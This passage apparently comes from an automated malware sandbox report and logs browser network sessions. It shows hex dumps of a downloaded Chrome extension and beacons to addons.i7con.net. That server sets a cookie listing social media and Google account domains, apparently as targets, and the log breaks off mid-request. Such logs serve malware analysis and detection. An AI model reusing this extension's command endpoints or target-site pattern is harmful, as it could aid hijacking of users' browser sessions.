                                                                                                                                          Content-Length: 128
                                                                                                                                          Accept: application/dns-message
                                                                                                                                          Accept-Language: *
                                                                                                                                          User-Agent: Chrome
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          2024-04-12 07:14:47 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                          2024-04-12 07:14:47 UTC247INHTTP/1.1 200 OK
                                                                                                                                          Server: cloudflare
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:47 GMT
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Content-Length: 468
                                                                                                                                          CF-RAY: 87316be64e008ccc-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-04-12 07:14:47 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 cb 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom()


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.549758142.251.40.974436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:49 UTC580OUTGET /crx/blobs/AfQPRnlnN3Mw8JIDvDD8lN9JQMGrnMry7wIOvVHOXgBo8BiA4Tc8VkbwTJGYjci0916e7uqSj344p5MqtR4g76CAefLNLtk5vSAF3_GUbh6fLcZenrmAAMZSmuUkzxMqWGdyV0Tn8REW3yyr1cG7Ag/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_75_4_0.crx HTTP/1.1
                                                                                                                                          Host: clients2.googleusercontent.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          2024-04-12 07:14:49 UTC572INHTTP/1.1 200 OK
                                                                                                                                          X-GUploader-UploadID: ABPtcPqClX_IwSGjLow_mImK35xNKxFTfXu0jKW8w1WtNB-HvvujZElAZ_Qrp12tXVabP1me4FupKDb4zg
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 98960
                                                                                                                                          X-Goog-Hash: crc32c=r3z9YA==
                                                                                                                                          Server: UploadServer
                                                                                                                                          Date: Thu, 11 Apr 2024 15:22:26 GMT
                                                                                                                                          Expires: Fri, 11 Apr 2025 15:22:26 GMT
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Age: 57143
                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 15:17:28 GMT
                                                                                                                                          ETag: 1595936e_bdbb8258_db7b1a1b_dbaa984b_1b549b3f
                                                                                                                                          Content-Type: application/x-chrome-extension
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close
                                                                                                                                          2024-04-12 07:14:49 UTC683INData Raw: 43 72 32 34 03 00 00 00 64 22 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                          Data Ascii: Cr24d"0"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                          2024-04-12 07:14:49 UTC1255INData Raw: 00 6c b6 a2 85 9e c2 e9 eb 86 9d 9e 7e 5f 26 c0 4b c7 d3 48 48 e2 c7 02 21 00 f7 1f 9f b1 36 5d 17 bc 7e ee 67 01 1c b9 e4 6e 7b ed 66 84 c0 08 51 32 19 81 49 70 98 a3 3f 73 22 f2 3e 1f 8b 08 00 00 00 00 00 00 ff bd 7c 5b 73 ab ba 9a ed 5f e9 5a cf bd aa 10 18 af d0 6f 21 20 30 31 22 08 5d 40 5d 5d ab 00 91 60 10 98 c4 24 c6 74 ed ff de f2 da bb 76 57 77 f5 74 d9 0f e7 bc 64 c6 99 dc 86 be cb 18 43 42 fe f7 ff fc 4d 36 a7 fa eb 30 cd 87 e3 f8 db bf fd 36 7f 35 4d 5b 9e da 7f 99 9a af 7f 79 3f a8 e6 b7 7f fd ed 74 f8 18 1b f9 67 7d 1c e7 66 9c 7f fb b7 ff fc 6d 2a 2f ea 58 4a 7d 7c 73 89 ba ca b4 0d c1 6d 23 37 db b6 36 5b 55 5f 76 5b 6e 9d 0e c5 b0 fc 14 e6 fc 5e 9b 6a 2b b2 dd 16 79 cf 36 3a 9c 0f 22 50 a3 c8 91 b1 eb 8e 07 7d 7c 1b 77 d4 dc 5d ff 3e a8
                                                                                                                                          Data Ascii: l~_&KHH!6]~gn{fQ2Ip?s">|[s_Zo! 01"]@]]`$tvWwtdCBM6065M[y?tg}fm*/XJ}|sm#76[U_v[n^j+y6:"P}|w]>
                                                                                                                                          2024-04-12 07:14:49 UTC1255INData Raw: f4 33 45 55 8f de a9 af ba 8a 39 44 f8 ac 17 a1 5c 29 80 2e 1f 9f 37 e5 03 f8 e2 c1 0e 6a 1f 1b 8c 21 dd 45 dc 37 62 80 95 40 a7 14 c6 02 35 e7 7c a6 86 fd 52 10 05 39 75 12 e2 09 48 69 7c 21 3e 7a 4f 5e 7e 89 af bf 37 3f 2b df 58 75 ae 0b 69 a1 bc 56 30 d6 5c df 13 6a 97 75 50 03 49 0a b3 e6 fd 42 2d 98 53 13 45 52 e1 85 f9 11 e0 bd 6d 3e c2 7f d2 98 2f 19 55 09 1b 7d 23 61 d3 77 43 e4 5c 31 3c b1 3c da f1 20 b2 34 9b 47 38 f0 ed 8c 0b c0 e8 e4 c5 54 f3 9f 09 5e c4 af fb 4b 7f 2f 3f 64 39 db a7 a6 7a 8f 3b f9 8d 21 7c 13 14 b6 99 42 20 ed d9 3e e1 51 54 ae cf 33 d6 3a a3 0a e6 3d eb 64 1b 13 f6 4e 4d 4c 1e e9 2f a2 d3 31 fb 2b 47 60 97 41 15 68 9d 17 ea eb 6f 90 09 df d0 70 dc 30 c5 4e 24 74 fb d2 7a 36 b9 87 8f b5 99 2e 72 55 f4 46 fc 54 f5 72 1f be c2
                                                                                                                                          Data Ascii: 3EU9D\).7j!E7b@5|R9uHi|!>zO^~7?+XuiV0\juPIB-SERm>/U}#awC\1<< 4G8T^K/?d9z;!|B >QT3:=dNML/1+G`Ahop0N$tz6.rUFTr
                                                                                                                                          2024-04-12 07:14:49 UTC1255INData Raw: fc a5 32 9d 7f cc bd fe d5 9b 70 b1 b2 45 e4 ed 18 2b 6c 22 c3 b0 28 83 a5 f4 51 50 79 30 2d 43 84 63 e5 5b 72 68 5f b0 0f 59 4c 23 5c eb f1 c7 86 fc d9 8d c6 e9 3a 9f 5b 70 fb a7 1a d4 b5 bf bd ff 35 8e ca f9 df f7 38 73 4f 8a bf 7a 64 27 70 3d ba c7 ca 70 14 ed a2 40 58 2e d3 b9 6f a4 4a 98 c2 88 de 9a 0c bc 21 d6 7e 97 ab fb 85 8d 39 fa ab ef 07 d0 f8 6b 9c 94 73 aa 4c 3d 8e 81 c6 63 8a cb 9d f8 ca c6 7f ba 54 24 b2 05 97 71 9a 01 af f6 e0 5e a8 28 4f 87 b3 85 fd 0f 2b cb 61 40 7d 49 d3 3c b2 74 3e bc e8 f1 60 31 71 ad 07 f0 f9 da 97 5c 18 95 6f 02 b8 9d ec 23 bf e8 64 c0 54 fb 5e 85 ee 21 21 cf b6 e6 fd 6d c3 d4 4b ec eb 3e 4a e3 59 5a 93 5f 03 77 bc 85 2f 37 90 7b 27 c6 0b 0a 54 97 05 cc 90 c3 fc 55 32 b9 d3 35 12 6b 0f f7 82 06 39 16 aa 0d 4a a5 f2
                                                                                                                                          Data Ascii: 2pE+l"(QPy0-Cc[rh_YL#\:[p58sOzd'p=p@X.oJ!~9ksL=cT$q^(O+a@}I<t>`1q\o#dT^!!mK>JYZ_w/7{'TU25k9J
                                                                                                                                          2024-04-12 07:14:49 UTC1255INData Raw: 19 53 c0 da 54 69 4e 81 f8 81 f8 ed 36 19 97 bc a4 ec 98 e5 72 1b 53 30 08 43 62 da c3 b0 d2 7a 9b 8f 38 63 04 5b 49 00 7c 94 b7 e7 46 ed 36 d4 8c 18 eb e1 fa 6b 7c f3 bd f8 50 c6 41 2c 3b 18 26 04 8a 78 9c 4e b9 e6 5b 1c 4a 21 a8 71 26 1c be 69 8d d6 69 3d 3b 69 7f 56 88 31 b6 e3 31 06 d5 a8 c4 03 f1 33 98 a5 bd 47 80 72 14 4c 9f 78 60 b0 30 d5 8e 80 f6 28 c7 d8 2a f3 dd cc 02 06 ea ce d7 f5 2f 66 a6 b9 10 ad b1 25 79 fb 73 03 df d7 9d f8 78 46 50 d8 b0 da 68 02 27 6f 86 89 eb ba e7 ba 4e c6 66 44 11 b2 8e 33 1a d4 3b c9 5b 42 29 38 50 13 1c b9 92 8a 58 e2 11 7e d8 34 0a 23 4e 10 c1 6b bb c6 61 fb 89 38 ec 6a 73 63 13 ca dc d8 9f 2c 4c 55 56 87 cc 60 60 67 09 cf d7 fe d3 29 d0 c8 6e 78 a4 79 be 13 df b9 f4 65 9a 9a f5 aa 7b b8 4a bb d6 15 8a 6e e2 5c 18
                                                                                                                                          Data Ascii: STiN6rS0Cbz8c[I|F6k|PA,;&xN[J!q&ii=;iV113GrLx`0(*/f%ysxFPh'oNfD3;[B)8PX~4#Nka8jsc,LUV``g)nxye{Jn\
                                                                                                                                          2024-04-12 07:14:49 UTC1255INData Raw: cf 55 30 b7 02 88 91 02 25 aa 4e 1d e3 c1 78 80 ff a2 6d 36 80 ae 81 be 51 b3 a8 65 01 ea 0b 02 61 3c c2 53 46 91 f6 9e da d5 5b f5 b9 1e 9e e6 66 8c 80 0c e0 16 7b 0c 23 d3 b9 31 bf 6b df d9 3f 77 26 cf db 2e 37 95 76 64 86 be 3f fe ac fa a3 56 48 3a 6b fc f3 a2 fb cc be 82 ae f6 6c 51 91 1b ec ad e4 ea 3d 66 68 2f c1 f4 40 7f d9 2d 7b 5a 9c d3 7c 67 5f df 71 2d 3d a4 84 d7 66 15 b5 db b8 9f 40 05 a3 7d 45 e1 8e 84 62 60 16 86 da eb f3 8c b9 db 74 80 b7 f0 dd ab 5f d6 7d 3e 4d 82 4d 18 19 33 2a 95 e2 22 57 a1 ce c5 6d e5 3f d9 7b 12 9d a5 f6 22 18 4a 16 53 b4 d3 de 50 f7 21 3c 08 18 3d 82 6f 2e 2c b9 64 44 f3 ab a1 08 cb d1 49 0c f6 92 f5 93 55 77 9a 9f 88 a4 09 47 5f b5 85 07 44 d5 52 e6 d0 a8 82 da c4 0a fe 7a 7e d7 72 ef f5 7f 20 a1 1b 9b f2 68 10 7c
                                                                                                                                          Data Ascii: U0%Nxm6Qea<SF[f{#1k?w&.7vd?VH:klQ=fh/@-{Z|g_q-=f@}Eb`t_}>MM3*"Wm?{"JSP!<=o.,dDIUwG_DRz~r h|
                                                                                                                                          2024-04-12 07:14:49 UTC1255INData Raw: 4e a0 3d 63 6e 87 fd f9 ab a6 c0 12 be 1d 56 34 da 32 8e df 92 a0 00 22 78 32 38 8c 8e 42 63 4b 7b f9 19 5b cf 8f f8 88 51 eb 57 bb 20 6d d0 04 0e 8f 43 f6 9e 8e 50 f7 6d db 2c 98 f3 2d fc fa 1c 07 d8 c8 c0 34 11 13 95 92 b5 af 78 15 48 3f d3 af e7 b1 2d 7c af 0e 4d f5 f3 2f 45 b7 5b 24 64 ac d6 63 9a 41 f6 5a af d4 2e 07 99 36 1e 3e e8 be 83 6a 7f 99 f1 60 db 69 cf b4 23 77 80 60 e2 21 7e c0 da a3 ec a9 53 b2 10 ce 22 90 73 06 c5 cb 9e 39 2b 0b 71 c7 46 bc 25 c1 7c 2c 56 b4 2f d6 36 c7 c6 d9 2a 54 bb 94 6b 7a a3 bf e0 7b 7d e0 97 ae a9 7d c9 e7 33 19 8b b3 f6 30 7e aa d0 91 73 71 a9 19 0c d1 ca ce b8 7f 5a b9 e7 da b1 e5 52 69 6a 3d 10 c0 9f 12 4e 0f cc 63 47 63 42 62 0b 5b 6e 26 a9 54 0d 9d 5f cb 01 82 2a 9c 8a 32 47 11 f6 d4 10 2b 54 22 28 31 ca fd 73
                                                                                                                                          Data Ascii: N=cnV42"x28BcK{[QW mCPm,-4xH?-|M/E[$dcAZ.6>j`i#w`!~S"s9+qF%|,V/6*Tkz{}}30~sqZRij=NcGcBb[n&T_*2G+T"(1s
                                                                                                                                          2024-04-12 07:14:49 UTC1255INData Raw: 5a ae e2 10 e9 bf ea 5c 1a dd 03 e3 ce 28 68 d4 c6 a1 28 f7 0c af cc 97 c9 3f f7 7f fc f7 1e a2 f3 75 3f 54 6e ea b8 0d ac cf 2d d4 d5 83 3a cb 5f 8d 63 1f 81 d4 70 70 e9 15 ab ce 17 80 98 ec 0b ea bc 26 4c eb 47 c0 f4 d8 44 98 d0 c9 e7 aa 4d eb be de 48 e5 14 99 69 1f e3 e1 74 78 67 c6 69 37 88 1f ed 6f 5a f9 f7 fd 17 17 c1 d9 df 73 43 e7 ca 5f f7 80 ce e1 ba a7 a9 04 ce 5a e6 93 d2 e3 61 c4 5e 6f fe fd 5c 65 08 0e de 4b 9e fe a5 27 cb 20 9a ab c1 fe d4 f9 ad 4a cb 9d 2b 93 75 fa b3 1e bb e5 bb 1a a2 5e 5f e7 54 6a cd 5c 5e f7 bd fd e3 5c 39 b0 4b 6d aa eb 98 ea 9c f0 bf d1 4a bf d1 df f7 54 5d 34 ce 9f c2 74 4e b9 a5 c7 7e 44 d3 b5 7e 92 0e 3a ff f8 ea 99 72 fe fe 6a 4e bf fd db bf ff e7 6f 6d 53 ca e6 eb fa 0d 34 fd e1 fa ed 33 e7 a6 3a cd c7 af e6 b7
                                                                                                                                          Data Ascii: Z\(h(?u?Tn-:_cpp&LGDMHitxgi7oZsC_Za^o\eK' J+u^_Tj\^\9KmJT]4tN~D~:rjNomS43:
                                                                                                                                          2024-04-12 07:14:49 UTC1255INData Raw: 2f f4 a3 7c 32 f5 d5 76 98 55 8f 1a 8d 44 6c 53 1a e3 94 22 58 8b 74 6b 2b 6d be 62 f3 41 1c e3 bf 6a ce e9 72 3e 98 4e 2e 6b 87 d3 29 74 e5 1d b0 f1 78 32 af c1 c2 66 f2 5b 35 39 84 20 a2 9d fa 16 c3 12 cc 61 66 81 81 8a 39 2e 39 2d 78 12 b0 8e fc ee b7 88 c5 ac 39 3b 2f 87 73 df 6b 42 73 35 d4 0c 86 9a e9 a1 6e b7 a3 ac d1 10 83 e5 30 d8 8c 06 5b f7 79 6d 08 83 0b 82 64 ca d9 08 76 26 8d d3 1e ef 2f a1 cf 9e 69 da 8f 32 28 66 fd 28 89 13 3f 0b a2 a4 1e 67 5b 5b e3 45 59 d6 e3 64 6b 2b 61 7e 0a 1b 70 93 4e c6 f9 b0 58 4c 59 52 22 cc 85 97 d3 e1 5c 3d 0b b0 4c 96 c1 72 79 07 06 7a 7c 7d 96 4c 4a 2f 34 c0 14 dc e8 79 26 7e 4e b3 c4 e9 c3 f0 66 73 36 4e 71 53 92 40 ac e1 98 5f d6 4e 60 9f e4 5a 8a be 6a 50 17 97 94 d5 60 18 70 ee 16 e9 7c 32 85 e5 90 eb 8f
                                                                                                                                          Data Ascii: /|2vUDlS"Xtk+mbAjr>N.k)tx2f[59 af9.9-x9;/skBs5n0[ymdv&/i2(f(?g[[EYdk+a~pNXLYR"\=Lryz|}LJ/4y&~Nfs6NqS@_N`ZjP`p|2
                                                                                                                                          2024-04-12 07:14:49 UTC1255INData Raw: b8 e2 4a da 08 6e 52 06 0d 95 18 d2 11 93 14 0c 76 11 69 de 9c ea 68 ea d1 19 c0 ea e8 97 80 76 d8 a2 9c 63 21 60 f2 2e 7d f1 39 7c b1 43 4f 8f 11 44 41 c0 b2 57 e0 b9 b3 02 e2 93 ea b8 03 5c 0c e2 a2 39 1f f0 b1 39 be 72 61 46 0a 91 2f d7 50 32 f9 e5 57 b0 5d ce b7 9d b5 9f ac 02 d0 be bf 1b 56 ab 3d 5e 57 ad bd 52 6d df aa 16 0e 68 2f 5b 75 75 aa d7 49 5d 70 42 e7 25 f7 bd 46 d1 f0 c2 9a d7 18 34 bc a0 a3 b7 97 95 b0 a2 d9 b5 ac 95 21 dd 80 9d 9c 73 af 21 bb 54 27 ae 50 38 72 10 ed c6 0a 8d c8 c3 fa d2 97 d5 0e fc ca 68 5f da 87 c0 1c e4 88 db 27 08 21 a8 f9 14 58 18 b9 2d df 88 d0 4d 4a 1e 39 0c 9e 5e f4 ad ad 41 93 d3 1c e1 d4 c3 46 87 ed ca 57 9f c6 77 dc ee 05 1a 97 78 52 22 f3 02 be 73 b0 98 cd 27 67 87 17 40 3f 42 fc ae 78 1a c1 53 36 9c 9d 23 24
                                                                                                                                          Data Ascii: JnRvihvc!`.}9|CODAW\99raF/P2W]V=^WRmh/[uuI]pB%F4!s!T'P8rh_'!X-MJ9^AFWwxR"s'g@?BxS6#$


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.54975723.106.238.2384431628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:50 UTC370OUTGET /ext/installed?1=1&from=Chrome1 HTTP/1.1
                                                                                                                                          Host: addons.i7con.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-04-12 07:14:51 UTC1342INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Fri, 12 Apr 2024 07:12:10 GMT
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: installed=true; expires=Sat, 12-Apr-2025 07:12:10 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: gxid=6618dd2fd6255; expires=Mon, 12-Apr-2027 07:12:10 GMT; Max-Age=94608000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: installed=true; expires=Sat, 12-Apr-2025 07:12:10 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com; expires=Sat, 12-Apr-2025 07:12:10 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Access-Control-Expose-Headers: Penblock
                                                                                                                                          Block: 2
                                                                                                                                          Kenblock: enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Penblock: 2-enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE
                                                                                                                                          Img-Error: undefined
                                                                                                                                          2024-04-12 07:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.549748172.64.41.34436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:50 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 128
                                                                                                                                          Accept: application/dns-message
                                                                                                                                          Accept-Language: *
                                                                                                                                          User-Agent: Chrome
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          2024-04-12 07:14:50 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                          2024-04-12 07:14:52 UTC247INHTTP/1.1 200 OK
                                                                                                                                          Server: cloudflare
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:52 GMT
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Content-Length: 468
                                                                                                                                          CF-RAY: 87316c02d9cb4301-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-04-12 07:14:52 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1b 00 04 8e fa 40 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom@C)


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.54976023.106.238.2384436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:50 UTC400OUTGET /ext/installed?1=1&from=Chrome1 HTTP/1.1
                                                                                                                                          Host: addons.i7con.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          2024-04-12 07:14:51 UTC1342INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Fri, 12 Apr 2024 07:12:10 GMT
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: installed=true; expires=Sat, 12-Apr-2025 07:12:10 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: gxid=6618dd2fd6255; expires=Mon, 12-Apr-2027 07:12:10 GMT; Max-Age=94608000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: installed=true; expires=Sat, 12-Apr-2025 07:12:10 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com; expires=Sat, 12-Apr-2025 07:12:10 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Access-Control-Expose-Headers: Penblock
                                                                                                                                          Block: 2
                                                                                                                                          Kenblock: enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Penblock: 2-enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE
                                                                                                                                          Img-Error: undefined
                                                                                                                                          2024-04-12 07:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.54975923.106.238.2384436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:51 UTC403OUTGET /ext/analytic?do=init&from=Chrome1 HTTP/1.1
                                                                                                                                          Host: addons.i7con.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
